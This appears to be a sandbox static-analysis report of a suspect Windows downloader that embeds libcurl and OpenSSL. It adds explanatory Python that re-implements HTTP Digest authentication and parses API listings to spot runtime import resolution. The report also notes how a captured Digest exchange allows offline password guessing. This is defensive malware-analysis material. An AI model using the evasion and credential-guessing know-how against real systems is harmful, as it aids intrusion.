• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$__allrem
• String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld$tP8g
• API String ID: 3299120379-1947200030
• Opcode ID: fbeca1f9ffb5500b1c4fdfce474cdf6aeec39677e8a55a3fb42f762c38b9461c
• Instruction ID: 0588001e4e220ad34abbaabd16ad3e52ba616718106bfc0dc35e8ced7075e052
• Opcode Fuzzy Hash: fbeca1f9ffb5500b1c4fdfce474cdf6aeec39677e8a55a3fb42f762c38b9461c
• Instruction Fuzzy Hash: D841C9F1B8430235F432319A6D47F6B616D9BE1F24F14482DFA41FA0C2D5D6E851607D
APIs
• curl_msnprintf.ACTIVE_SETUP(?,00000021,%08x%08x%08x%08x,00000000,00000000,00000000), ref: 00FCE813
• curl_maprintf.ACTIVE_SETUP(%s:%s:%s,?,?,?,Digest,?,00000000,00000000), ref: 00FCE862
  • Part of subcall function 00FCE660: curl_msnprintf.ACTIVE_SETUP(?,00000003,%02x,?,?,00000000,00FCE89C), ref: 00FCE673
• curl_maprintf.ACTIVE_SETUP(%s:%s:%s,?,00000000,?), ref: 00FCE8B3
• curl_maprintf.ACTIVE_SETUP(%s:%.*s,?,00000000,?), ref: 00FCE90D
• curl_maprintf.ACTIVE_SETUP(%s:%s,?,?), ref: 00FCE922
• curl_maprintf.ACTIVE_SETUP(%s:%s,00000000,d41d8cd98f00b204e9800998ecf8427e), ref: 00FCE950
• curl_maprintf.ACTIVE_SETUP(%s:%s:%08x:%s:%s:%s,?,?,?,?,?,?), ref: 00FCE9BC
• curl_maprintf.ACTIVE_SETUP(%s:%s:%s,?,?,?), ref: 00FCE9DB
• curl_maprintf.ACTIVE_SETUP(%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=%08x, qop=%s, response="%s",Proxy-,00000000,?,?,?,?,?,?,?), ref: 00FCEA60
• curl_maprintf.ACTIVE_SETUP(%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s",Proxy-,00000000,?,?,?,?), ref: 00FCEAB0
• curl_maprintf.ACTIVE_SETUP(%s, opaque="%s",00000000,?), ref: 00FCEAE2
• curl_maprintf.ACTIVE_SETUP(%s, algorithm="%s",?,?), ref: 00FCEB12
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: curl_maprintf$curl_msnprintf
• String ID: %08x%08x%08x%08x$%s, algorithm="%s"$%s, opaque="%s"$%s:%.*s$%s:%s$%s:%s:%08x:%s:%s:%s$%s:%s:%s$%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=%08x, qop=%s, response="%s"$%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"$Digest$Proxy-$auth$auth-int$d41d8cd98f00b204e9800998ecf8427e
• API String ID: 1854414677-2523086975
• Opcode ID: 323176d3b38948aa15f2a03f2cfdd0be62b05ee30f74c980c3c49e96a2674b5d
• Instruction ID: 376ced448d4bd128144d725bd3b4142fe10572d66b02ea3c402a11e30a8700ad
• Opcode Fuzzy Hash: 323176d3b38948aa15f2a03f2cfdd0be62b05ee30f74c980c3c49e96a2674b5d
• Instruction Fuzzy Hash: 89D1ADB1900602AFD720DB65CD46FABB7A8BF84714F04492DF9899B201E735E914DBE2
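The format strings in the entry above are those of an HTTP Digest client: "%s:%s:%s" builds HA1 = MD5(username:realm:password), "%s:%s" builds HA2 = MD5(method:uri), "%s:%s:%08x:%s:%s:%s" is the RFC 2617 response MD5(HA1:nonce:nc:cnonce:qop:HA2), the second "%s:%s:%s" is the older RFC 2069 response MD5(HA1:nonce:HA2), "%08x%08x%08x%08x" is a client nonce made of four random 32-bit words, and d41d8cd98f00b204e9800998ecf8427e is MD5 of the empty string, appended to HA2 for qop=auth-int instead of a hash of the real request body. Together with the curl_maprintf / curl_msnprintf symbols this identifies libcurl's Digest routines statically linked into the sample. The Python below is an added clean-room re-implementation of that computation, written for this page; it is not code from the sample or from libcurl. It shows what the embedded client produces for a challenge and how a server verifies it, including the auth-int and no-qop branches; the RFC 2617 section 3.5 test vector (user Mufasa, password "Circle Of Life") is used for the check. MD5-sess (HA1 rehashed with nonce and cnonce, selected through the algorithm= parameter seen in the listing) is not implemented here.

```python
"""HTTP Digest (RFC 2617 / RFC 7616, MD5 variant) as built by the client above.

Added clean-room illustration for this page: not code from the sample and not
libcurl's code.  The known-answer values come from RFC 2617 section 3.5.
"""
import hashlib
import hmac
import os
import re

# MD5(""), hard-coded in the listing: for qop=auth-int the client hashes an
# empty body in place of the real entity body.
EMPTY_BODY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"

# key="quoted value" or key=bare (nc=..., qop=... are sent unquoted)
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def _md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def make_cnonce() -> str:
    """Client nonce: four random 32-bit words, the listing's "%08x%08x%08x%08x"."""
    return "".join(f"{int.from_bytes(os.urandom(4), 'big'):08x}" for _ in range(4))


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=1, cnonce=None, body_md5=None):
    """Return the hex 'response' value for one Digest challenge."""
    ha1 = _md5_hex(f"{username}:{realm}:{password}")               # "%s:%s:%s"
    ha2 = _md5_hex(f"{method}:{uri}")                               # "%s:%s"
    if qop == "auth-int":
        # auth-int covers the entity body; the sample substitutes MD5("") here.
        ha2 = _md5_hex(f"{method}:{uri}:{body_md5 or EMPTY_BODY_MD5}")
    if qop:                                                          # RFC 2617 form
        return _md5_hex(f"{ha1}:{nonce}:{nc:08x}:{cnonce}:{qop}:{ha2}")  # "%s:%s:%08x:%s:%s:%s"
    return _md5_hex(f"{ha1}:{nonce}:{ha2}")                          # RFC 2069 form, "%s:%s:%s"


def digest_header(username, realm, password, method, uri, nonce, qop=None, nc=1,
                  cnonce=None, opaque=None, algorithm=None, proxy=False):
    """Build the Authorization / Proxy-Authorization header in the listing's layout."""
    if qop and cnonce is None:
        cnonce = make_cnonce()
    response = digest_response(username, realm, password, method, uri, nonce, qop, nc, cnonce)
    prefix = "Proxy-" if proxy else ""
    if qop:
        header = (f'{prefix}Authorization: Digest username="{username}", realm="{realm}", '
                  f'nonce="{nonce}", uri="{uri}", cnonce="{cnonce}", nc={nc:08x}, '
                  f'qop={qop}, response="{response}"')
    else:
        header = (f'{prefix}Authorization: Digest username="{username}", realm="{realm}", '
                  f'nonce="{nonce}", uri="{uri}", response="{response}"')
    if opaque:
        header += f', opaque="{opaque}"'            # '%s, opaque="%s"'
    if algorithm:
        header += f', algorithm="{algorithm}"'      # '%s, algorithm="%s"'
    return header


def parse_digest_header(header: str) -> dict:
    """Split the key=value list after 'Digest '; quoted and bare values both occur."""
    _, _, params = header.partition("Digest ")
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _PARAM_RE.finditer(params)}


def verify_digest(header: str, method: str, password_for) -> bool:
    """Server side: recompute from the stored password and compare in constant time."""
    p = parse_digest_header(header)
    try:
        expected = digest_response(
            p["username"], p["realm"], password_for(p["username"]), method, p["uri"],
            p["nonce"], qop=p.get("qop"), nc=int(p.get("nc", "1"), 16), cnonce=p.get("cnonce"))
    except KeyError:
        return False
    return hmac.compare_digest(expected, p.get("response", ""))
```

Two practical consequences follow from the listing. A server that accepts qop=auth-int from this client is only ever protecting an empty body, since the entity hash is constant; and because HA1 is a fixed function of username, realm and password, one captured exchange is enough material for offline password guessing, which is why Digest is not a substitute for TLS on the C2 path or anywhere else.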
APIs
  • Part of subcall function 00FC10F0: curl_mvsnprintf.ACTIVE_SETUP(?,00000801,?,?,00FBEBDD), ref: 00FC1133
• curl_msnprintf.ACTIVE_SETUP(00000000,00002000,%lx,00000000,?, Version: %lu (0x%lx),00000001,00000000,?,?,00000000,Issuer,00000000,?, Issuer: %s,00000000), ref: 00FC81B0
  • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
• curl_msnprintf.ACTIVE_SETUP(00000000,00002000,%lx,00000000,?, Serial Number: %ld (0x%lx),00000000,00000000,00000000), ref: 00FC81FE
• curl_msnprintf.ACTIVE_SETUP(00000004,00000003,%02x%c,-00000009,-00000009), ref: 00FC837F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: curl_msnprintf$curl_mvsnprintf
• String ID: Expire date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %ld (0x%lx)$ Signature Algorithm: %s$ Start date: %s$ Unable to load public key$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$Expire date$Issuer$Public Key Algorithm$Serial Number$Signature Algorithm$Start date$Subject$Version
• API String ID: 405648482-1965205160
• Opcode ID: 2af2ded2a154571c74238510327c0bd0465767ee120da26159dec49e32529108
• Instruction ID: ce2a52a9ca53980386f6fb9503a9df8c2083bea77506b05ee9079def12bb453e
• Opcode Fuzzy Hash: 2af2ded2a154571c74238510327c0bd0465767ee120da26159dec49e32529108
• Instruction Fuzzy Hash: 4A51A275A443067BD200BA52CD83F2F76ADAF86788F14041CF8456B203DA2DBD01A6F6
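Every "APIs" listing in these entries has one line shape: "• api.MODULE(args), ref: ADDR", with "Part of subcall function ADDR:" prefixed when the call is made by a callee, and with no argument list for CRT helpers such as "__allrem.LIBCMT ref: ...". A report this size is far easier to triage when those lines are parsed into records than when they are read entry by entry: call sites can then be grouped per API, and a GetProcAddress can be paired with the LoadLibrary that precedes it, which is how runtime API resolution shows up in a listing. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. The first three sample lines are copied from the listings above; the LoadLibraryA/GetProcAddress/FreeLibrary trio is constructed to exercise the pairing and is not claimed to appear in any particular function of this sample. The pairing itself is positional, an assumption stated in the code.

```python
"""Parser for the per-function 'APIs' listings in this report.

Added example: not part of the Joe Sandbox report and not code from the sample.
It turns listing lines into records so call chains can be mined across many
entries instead of being read by hand.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One listing line: '• api.MODULE(args), ref: ADDR', optionally prefixed with
# 'Part of subcall function ADDR: ', and with no '(args)' for CRT helpers such as
# '__allrem.LIBCMT ref: ...'.  'args' is greedy so that format strings containing
# parentheses, e.g. ' Version: %lu (0x%lx)', stay whole; the trailing '), ref:'
# anchors the end of the argument list.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^.(\s]+)\.(?P<module>[^(\s]+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Library-loading APIs whose first argument names the module a later
# GetProcAddress resolves from.
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int
    args: list = field(default_factory=list)
    raw_args: str = ""
    subcall_of: Optional[int] = None


def parse_api_lines(lines):
    """Parse listing lines in order; lines that do not match the shape are skipped."""
    calls = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        # Caveat: the report does not escape commas inside string arguments, so a
        # plain split cuts a format string such as 'username="%s", realm="%s"' into
        # pieces.  raw_args keeps the unsplit text for those cases.
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("module"), ref=int(m.group("ref"), 16),
            args=raw.split(",") if raw else [], raw_args=raw,
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


def dynamic_imports(calls):
    """Pair each GetProcAddress with the most recent library load in the listing.

    The handle argument is printed as 00000000 (unknown statically), so the pairing
    is positional: an assumption that holds for straight-line resolver stubs but not
    for code that juggles several module handles at once."""
    resolved, current_dll = [], None
    for c in calls:
        if c.api in LOADERS and c.args:
            current_dll = c.args[0].strip()
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            resolved.append((current_dll, c.args[-1].strip(), c.ref))
    return resolved


def api_refs(calls):
    """Map each API name to the sorted call sites that reference it."""
    out = {}
    for c in calls:
        out.setdefault(c.api, []).append(c.ref)
    return {k: sorted(v) for k, v in out.items()}


# Constructed input.  The first three lines are copied from listings above; the
# last three are made up to exercise the runtime-resolution pairing and are not
# claimed to appear in any function of this sample.
SAMPLE_LISTING = [
    "• curl_msnprintf.ACTIVE_SETUP(00000000,00002000,%lx,00000000,?, Version: %lu (0x%lx),00000001,00000000,?,?,00000000,Issuer,00000000,?, Issuer: %s,00000000), ref: 00FC81B0",
    "  • Part of subcall function 00FC10F0: curl_mvsnprintf.ACTIVE_SETUP(?,00000801,?,?,00FBEBDD), ref: 00FC1133",
    "• __allrem.LIBCMT ref: 00FC9571",
    "• LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00401000",
    "• GetProcAddress.KERNEL32(00000000,OpenProcess), ref: 00401010",
    "• FreeLibrary.KERNEL32(00000000), ref: 00401020",
]

if __name__ == "__main__":
    for dll, func, ref in dynamic_imports(parse_api_lines(SAMPLE_LISTING)):
        print(f"{dll}!{func} resolved at runtime, GetProcAddress @ {ref:08X}")
```

Feeding the parser the whole report (every "APIs" block, in order) and diffing dynamic_imports() against the sample's static import table is the quickest way to list the APIs the binary deliberately keeps out of its IAT; the constructed trio above stands in for that pattern without asserting which names this sample resolves.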
APIs
• LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 01052B69
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 01052BB6
• FreeLibrary.KERNEL32(00000000), ref: 01052BBF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: .\crypto\dso\dso_win32.c$CreateToolhelp32Snapshot$KERNEL32.DLL$Module32First$Module32Next
• API String ID: 145871493-1549069882
APIs
• curl_easy_setopt.ACTIVE_SETUP(00000000,00002712,?), ref: 00FB2763
• curl_easy_setopt.ACTIVE_SETUP(00000000,00000044,0000000A,00000000,00002712,?), ref: 00FB276D
• curl_easy_setopt.ACTIVE_SETUP(00000000,00000034,00000001,00000000,00000044,0000000A,00000000,00002712,?), ref: 00FB2777
• curl_easy_setopt.ACTIVE_SETUP(00000000,0000003A,00000001,00000000,00000034,00000001,00000000,00000044,0000000A,00000000,00002712,?), ref: 00FB2781
• curl_easy_setopt.ACTIVE_SETUP(00000000,00000063,00000001,00000000,0000003A,00000001,00000000,00000034,00000001,00000000,00000044,0000000A,00000000,00002712,?), ref: 00FB278B
• curl_easy_setopt.ACTIVE_SETUP(00000000,0000004B,00000001,00000000,00000063,00000001,00000000,0000003A,00000001,00000000,00000034,00000001,00000000,00000044,0000000A,00000000), ref: 00FB2795
• curl_easy_setopt.ACTIVE_SETUP(00000000,00002722,easeus-downloader/1.0), ref: 00FB27A8
• curl_easy_setopt.ACTIVE_SETUP(00000000,00000040,00000000,00000000,00002722,easeus-downloader/1.0), ref: 00FB27B2
• curl_easy_setopt.ACTIVE_SETUP(00000000,00000051,00000000,00000000,00000040,00000000,00000000,00002722,easeus-downloader/1.0), ref: 00FB27BC
• curl_easy_setopt.ACTIVE_SETUP(00000000,00004E2B,00FB2440,00000000,00000051,00000000,00000000,00000040,00000000,00000000,00002722,easeus-downloader/1.0), ref: 00FB27CC
• curl_easy_setopt.ACTIVE_SETUP(00000000,00000013,00000001,00000000,00004E2B,00FB2440,00000000,00000051,00000000,00000000,00000040,00000000,00000000,00002722,easeus-downloader/1.0), ref: 00FB27D6
• curl_easy_setopt.ACTIVE_SETUP(00000000,00000014,00000014,00000000,00000013,00000001,00000000,00004E2B,00FB2440,00000000,00000051,00000000,00000000,00000040,00000000,00000000), ref: 00FB27E0
Strings
Similarity
• API ID: curl_easy_setopt
• String ID: easeus-downloader/1.0
• API String ID: 2879491745-3247282751
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: .\ssl\s23_srvr.c$CONNECT$GET $HEAD $POST $PUT $s->version <= TLS_MAX_VERSION
• API String ID: 909875538-1747794495
APIs
Strings
Similarity
• API ID: _strncpy$_fgetscurl_maprintf
• String ID: $%s%s%s$HOME$_netrc$login$machine$password
• API String ID: 3602019725-1454648440
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FB2526
• ReleaseMutex.KERNEL32(?), ref: 00FB25BC
• _memset.LIBCMT ref: 00FB25D0
• __snprintf.LIBCMT ref: 00FB25F7
• curl_easy_setopt.ACTIVE_SETUP(?,00002717,?), ref: 00FB260E
• curl_easy_setopt.ACTIVE_SETUP(?,00002711,?), ref: 00FB2631
• curl_easy_perform.ACTIVE_SETUP(?), ref: 00FB263A
Strings
Similarity
• API ID: curl_easy_setopt$MutexObjectReleaseSingleWait__snprintf_memsetcurl_easy_perform
• String ID: %llu-%llu
• API String ID: 478814842-3095788464
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC93F0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC9420
• curl_msnprintf.ACTIVE_SETUP(?,00000009,%2lld:%02lld:%02lld,00000000,?,?,?,tP8g,tP8g,?,?,0000003C,00000000,00000000,?,0000003C), ref: 00FC9469
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC947F
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC94B1
• curl_msnprintf.ACTIVE_SETUP(?,00000009,%3lldd %02lldh,00000000,?,00000000,?,tP8g,tP8g,00000E10,00000000,00000000,?,00015180,00000000,tP8g), ref: 00FC94C6
• curl_msnprintf.ACTIVE_SETUP(?,00000009,%7lldd,00000000,?,tP8g,tP8g,00015180,00000000,tP8g,tP8g,00000E10,00000000,?,?,tP8g), ref: 00FC94E1
  • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$curl_mvsnprintf
                                                                                                                                                  • String ID: %2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$--:--:--$tP8g
                                                                                                                                                  • API String ID: 3182149714-92647468
                                                                                                                                                  • Opcode ID: 5854f3c0bb43ad525f4c2f0f3981b0acb7afea0ff3e3730b5a4a61aea11b0413
                                                                                                                                                  • Instruction ID: da89c21a7ec4ec020c408a61f0c83c70643f2fd48d02acc1b23853458a105cf0
                                                                                                                                                  • Opcode Fuzzy Hash: 5854f3c0bb43ad525f4c2f0f3981b0acb7afea0ff3e3730b5a4a61aea11b0413
                                                                                                                                                  • Instruction Fuzzy Hash: DC312A723487057EF228F669AC86F7BBB9DDBC0F64F05851CF5846B182D5A1EC41C2A1
APIs
• curl_easy_unescape.ACTIVE_SETUP(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00FBE2FD,?), ref: 00FBD46E
• curl_easy_unescape.ACTIVE_SETUP(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00FBE2FD,?), ref: 00FBD4DE
• __wcstoi64.LIBCMT ref: 00FBD5B9
Strings
Similarity
• API ID: curl_easy_unescape$__wcstoi64
• String ID: ://$Invalid IPv6 address format$socks$socks4$socks4a$socks5$socks5h
• API String ID: 3888968855-3220830998
• Opcode ID: 5383b19b9830fb14ce3ae956ba43840bbd8dd22ce277c9969c14fcde7fb595ee
• Instruction ID: bd5d15f8962a48bec53689fca999fb84e5d6aa154151820db32ed7ec7e54a844
• Opcode Fuzzy Hash: 5383b19b9830fb14ce3ae956ba43840bbd8dd22ce277c9969c14fcde7fb595ee
• Instruction Fuzzy Hash: 988119B1E043025BE7309A269C46BE77BD4AF01754F1C4529F885CA242FB75E944EBA3
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FB2526
• ReleaseMutex.KERNEL32(?), ref: 00FB25BC
• _memset.LIBCMT ref: 00FB25D0
• __snprintf.LIBCMT ref: 00FB25F7
• curl_easy_setopt.ACTIVE_SETUP(?,00002717,?), ref: 00FB260E
• curl_easy_setopt.ACTIVE_SETUP(?,00002711,?), ref: 00FB2631
• curl_easy_perform.ACTIVE_SETUP(?), ref: 00FB263A
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FB266C
• ReleaseMutex.KERNEL32(?), ref: 00FB2698
• ReleaseMutex.KERNEL32(?), ref: 00FB26BD
Strings
Similarity
• API ID: MutexRelease$ObjectSingleWaitcurl_easy_setopt$__snprintf_memsetcurl_easy_perform
• String ID: %llu-%llu
• API String ID: 4246426443-3095788464
• Opcode ID: 375cf1d8586af4edb781e7b41d9e0852f7dcddd00c348cd1f22561aed3eb3cd8
• Instruction ID: b86de5252c1071c0f75d9c9a8df79d900d74c1271a29846960029a9b3322f542
• Opcode Fuzzy Hash: 375cf1d8586af4edb781e7b41d9e0852f7dcddd00c348cd1f22561aed3eb3cd8
• Instruction Fuzzy Hash: 20519AB5A04301AFC320EF25C890EABB7E6BF98724F54891CF99587391D775E805CB62
APIs
• getpeername.WS2_32(?,?,?), ref: 00FC362E
• WSAGetLastError.WS2_32(?,?), ref: 00FC3638
  • Part of subcall function 00FC64B0: GetLastError.KERNEL32(?,00000000,?,00FC127B,?,00000000), ref: 00FC64B3
  • Part of subcall function 00FC64B0: _strerror.LIBCMT ref: 00FC64DF
  • Part of subcall function 00FC64B0: _strncpy.LIBCMT ref: 00FC64E9
  • Part of subcall function 00FC64B0: _strrchr.LIBCMT ref: 00FC653D
  • Part of subcall function 00FC64B0: _strrchr.LIBCMT ref: 00FC6558
  • Part of subcall function 00FC64B0: GetLastError.KERNEL32 ref: 00FC6570
  • Part of subcall function 00FC64B0: SetLastError.KERNEL32(00000000), ref: 00FC657B
  • Part of subcall function 00FC1180: curl_mvsnprintf.ACTIVE_SETUP(00FB8A4C,00004000,tP8g,tP8g,tP8g,00000000,00FC9C63,tP8g,Callback aborted), ref: 00FC119C
  • Part of subcall function 00FC1180: curl_msnprintf.ACTIVE_SETUP(8904C483,00000100,0109FC00,00FB8A4C), ref: 00FC11C3
• getsockname.WS2_32(?,?,?), ref: 00FC366E
• WSAGetLastError.WS2_32(?,?), ref: 00FC3678
Strings
• ssrem inet_ntop() failed with errno %d: %s, xrefs: 00FC36CA
• getpeername() failed with errno %d: %s, xrefs: 00FC3649
• ssloc inet_ntop() failed with errno %d: %s, xrefs: 00FC370B
• getsockname() failed with errno %d: %s, xrefs: 00FC3689
Similarity
• API ID: ErrorLast$_strrchr$_strerror_strncpycurl_msnprintfcurl_mvsnprintfgetpeernamegetsockname
• String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
• API String ID: 1553613232-670633250
• Opcode ID: be614a62eca03f050a41d630ac0c8e1ccf1624d0a9967ea68e8ce0df7dcaebb0
• Instruction ID: 36eae9ead77c646a41694438b8ef2e83df0832391a55ebf605ddd511c208dfa7
• Opcode Fuzzy Hash: be614a62eca03f050a41d630ac0c8e1ccf1624d0a9967ea68e8ce0df7dcaebb0
• Instruction Fuzzy Hash: 163164B1504207ABD730EF21DD46FEB7B9CEF85794F04841DFD4992102E639AA099BA2
APIs
Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncmp
                                                                                                                                                  • String ID: .\ssl\ssl_ciph.c$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                                                                                                                  • API String ID: 909875538-1589776776
APIs
Similarity
• API ID: CountTick$CloseCurrentFreeGlobalHandleLibraryMemoryProcessStatus
• String ID:
• API String ID: 2654232908-0
Strings
• Re-using existing connection! (#%ld) with host %s, xrefs: 00FBE561
• We can reuse, but we want a new connection anyway, xrefs: 00FBE50C
• Found connection %ld, with requests in the pipe (%zu), xrefs: 00FBE4E0
• memory shortage, xrefs: 00FBE241
• %s://%s, xrefs: 00FBE191
• No connections available., xrefs: 00FBE5F1
Similarity
• API ID:
• String ID: %s://%s$Found connection %ld, with requests in the pipe (%zu)$No connections available.$Re-using existing connection! (#%ld) with host %s$We can reuse, but we want a new connection anyway$memory shortage
• API String ID: 0-2087944716
APIs
• curl_strequal.ACTIVE_SETUP(?,?), ref: 00FBD09D
